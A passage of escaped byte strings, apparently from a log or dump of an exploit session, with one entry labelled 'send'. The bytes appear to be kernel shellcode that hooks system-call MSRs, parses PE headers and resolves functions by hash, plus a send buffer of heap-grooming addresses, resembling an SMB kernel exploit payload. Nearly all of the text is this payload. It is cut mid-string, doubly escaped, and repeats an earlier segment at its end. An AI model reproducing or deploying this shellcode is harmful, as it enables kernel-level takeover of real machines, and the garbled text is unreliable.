\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 5, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\
x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\
x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
